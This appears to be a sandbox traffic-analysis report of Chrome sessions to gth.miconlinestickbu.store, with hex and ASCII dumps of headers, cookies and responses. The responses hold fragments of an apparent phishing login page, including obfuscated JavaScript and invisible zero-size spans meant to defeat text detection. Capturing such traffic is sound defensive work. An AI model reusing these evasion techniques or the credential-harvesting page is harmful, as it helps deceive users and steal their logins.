                                    2024-05-22 15:09:24 UTC855INData Raw: 39 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 33 31 39 33 33 2c 5f 30 78 31 36 32 34 34 63 29 7b 76 61 72 20 5f 30 78 32 36 38 33 34 38 3d 5f 30 78 32 35 38 65 31 62 3b 5f 30 78 32 62 65 64 39 37 2b 3d 27 27 2b 5f 30 78 31 36 32 34 34 63 5b 30 78 30 5d 2b 5f 30 78 32 36 38 33 34 38 28 30 78 31 34 31 29 3b 7d 29 3b 7d 65 6c 73 65 7b 69 66 28 5f 30 78 33 35 64 31 35 32 5b 5f 30 78 32 35 38 65 31 62 28 30 78 31 36 34 29 5d 3d 3d 30 78 31 61 33 29 6c 6f 63 61 74 69 6f 6e 5b 5f 30 78 32 35 38 65 31 62 28 30 78 31 35 31 29 5d 28 29 3b 65 6c 73 65 7b 7d 7d 7d 2c 27 63 6f 6d 70 6c 65 74 65 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 35 64 63 37 34 29 7b 76 61 72 20 5f 30 78 31 65 38 63 64 35 3d 5f 30 78 33 36 37 63 62 35 3b 5f 30 78 32 36 31 31 38 32 5b 5f
                                    Data Ascii: 9)],function(_0x131933,_0x16244c){var _0x268348=_0x258e1b;_0x2bed97+=''+_0x16244c[0x0]+_0x268348(0x141);});}else{if(_0x35d152[_0x258e1b(0x164)]==0x1a3)location[_0x258e1b(0x151)]();else{}}},'complete':function(_0x25dc74){var _0x1e8cd5=_0x367cb5;_0x261182[_


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    35192.168.2.449804104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:25 UTC1115OUTGET /1 HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:25 UTC702INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:25 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XrE3pf6wDgVtNfc4my1ShSGr3PE6zxZDKlBV%2FQdHHlzN2KU%2BDrYV5LX3TZmqu0dPMDbP14QScLz%2B2L2GKZo45qLNJB7ukb0fjIk4JeBlYbtjW7d9xpaKqmxKlREIyDtIgqH8NKEZm35ZjIdETw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba2899280f69-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:25 UTC667INData Raw: 33 30 39 61 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 36 31 37 62 35 61 37 30 32 61 33 34 64 61 64 64 64 30 33 30 37 31 36 35 30 66 39 35 63 62 65 36 36 36 34 65 30 61 61 35 35 37 34 35 33 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 31 66 38 62 61 61 66 31 35 63 61 38 63 37 37 63 39 30 33 62 33 37 34 66 62 66 63 39 66 30 32 31 36 36 34 65 30 61 61 32 36 66 37 33 36 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61
                                    Data Ascii: 309a <html dir="ltr" class="617b5a702a34daddd03071650f95cbe6664e0aa557453" lang="en"> <head> <title> 1f8baaf15ca8c77c903b374fbfc9f021664e0aa26f736 </title> <meta http-equiv="Content-Type" content="text/html; cha
                                    2024-05-22 15:09:25 UTC1369INData Raw: 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 63 62 20 36 31 37 62 35 61 37 30 32 61 33 34 64 61 64 64 64 30 33 30 37 31 36 35 30 66 39 35 63 62 65 36 36 36 34 65 30 61 61 35 35 37 34 35 63 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 67 72 6f 75 6e 64 20 36 31 37 62 35 61 37 30 32 61 33 34 64 61 64 64 64 30 33 30 37 31 36 35 30 66 39 35 63 62 65 36 36 36 34 65 30 61 61 35 35 37 34 35 64 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e
                                    Data Ascii: tylesheet"> </head> <body class="cb 617b5a702a34daddd03071650f95cbe6664e0aa55745c" style="display: block;"> <div> <div> <div class="background 617b5a702a34daddd03071650f95cbe6664e0aa55745d" role="presentation">
                                    2024-05-22 15:09:25 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6c 6f 67 5f 66 6f 72 6d 22 20 63 6c 61 73 73 3d 22 69 6e 6e 65 72 20 66 61 64 65 2d 69 6e 2d 6c 69 67 68 74 62 6f 78 20 36 31 37 62 35 61 37 30 32 61 33 34 64 61 64 64 64 30 33 30 37 31 36 35 30 66 39 35 63 62 65 36 36 36 34 65 30 61 61 35 35 37 35 37 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 69 67 68 74 62 6f 78 2d 63 6f 76 65 72 20 36 31 37 62 35 61 37 30 32 61 33 34 64 61 64 64 64 30 33 30 37 31 36 35 30 66 39 35 63 62 65 36 36 36 34 65 30 61 61 35 35 37 35 37 34 22 3e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                    Data Ascii: <div id="log_form" class="inner fade-in-lightbox 617b5a702a34daddd03071650f95cbe6664e0aa557573"> <div class="lightbox-cover 617b5a702a34daddd03071650f95cbe6664e0aa557574"> </div>
                                    2024-05-22 15:09:25 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 4a 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20
                                    Data Ascii: S<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">J</span>i<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px;
                                    2024-05-22 15:09:25 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 61 6c 65 72 74 22 20 61 72 69 61 2d 6c 69 76 65 3d 22 61 73 73 65 72 74 69 76 65 22 3e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 68 69 64 64 65 6e 3d 22 22 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 34 20 65 72 72 6f 72 20 65 78 74 2d 65 72 72 6f 72 22 20 69 64 3d 22 75 73 65 72 6e 61 6d 65 45 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22
                                    Data Ascii: <div role="alert" aria-live="assertive"> </div> <div hidden="" class="col-md-24 error ext-error" id="usernameError"> E<span style="
                                    2024-05-22 15:09:25 UTC1369INData Raw: 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e
                                    Data Ascii: -size: 0.02px;">5</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>l<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; fon
                                    2024-05-22 15:09:25 UTC1369INData Raw: 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 64 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78
                                    Data Ascii: width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>d<span style="display: inline; color: rgba(26, 125, 117, 0); max
                                    2024-05-22 15:09:25 UTC1369INData Raw: 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e
                                    Data Ascii: ine; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>n<span style="display: in
                                    2024-05-22 15:09:25 UTC1369INData Raw: 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 2c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30
                                    Data Ascii: px;">5</span>,<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span> <span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.0
                                    2024-05-22 15:09:25 UTC831INData Raw: 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30
                                    Data Ascii: px; max-height: 0.03px; font-size: 0.02px;">5</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    36192.168.2.449803104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:25 UTC1189OUTGET /favicon.ico HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:25 UTC633INHTTP/1.1 404 Not Found
                                    Date: Wed, 22 May 2024 15:09:25 GMT
                                    Content-Type: text/html; charset=iso-8859-1
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: MISS
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5vo4OVo4zWhkyQClFNRSBqmDHkroGg4kkZ8WvPgkQryvEPB%2B%2BiRaxcXE6pP94ovxajWINn1bZHUvGnC6IT0uGywUf0arU7%2Fqf4nFyPWHax5x0Igm2fMHrFGLbX0EcIEiZb9L19mbCAQ%2FhbOmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba289bc842b0-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:25 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                    Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                    2024-05-22 15:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    37192.168.2.449805104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:26 UTC1227OUTGET /APP-617b5a702a34daddd03071650f95cbe6664e0aa557459/617b5a702a34daddd03071650f95cbe6664e0aa55745b HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: text/css,*/*;q=0.1
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: style
                                    Referer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:26 UTC640INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:26 GMT
                                    Content-Type: text/css
                                    Content-Length: 105369
                                    Connection: close
                                    Last-Modified: Tue, 14 May 2024 10:31:22 GMT
                                    Accept-Ranges: bytes
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVjLf4kdrkA0VYWU5UnHRnFDSDwjAQ8SAQ9mfoPk0E20j3Y4mnkOCbv0J4Xe1KlXG7nZxoM%2Fo0VpGp0XA2x3DXdU2oG0ik4qJTwJMkUtW1%2BDyPOED%2Bla6gygWVv9yqdZNQj1QyVfYuvlBMXOMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba2e7e85429d-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:26 UTC729INData Raw: 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72
                                    Data Ascii: html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;ver
                                    2024-05-22 15:09:26 UTC1369INData Raw: 64 64 65 6e 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 7d 70 72 65 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 7b 6f
                                    Data Ascii: dden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{o
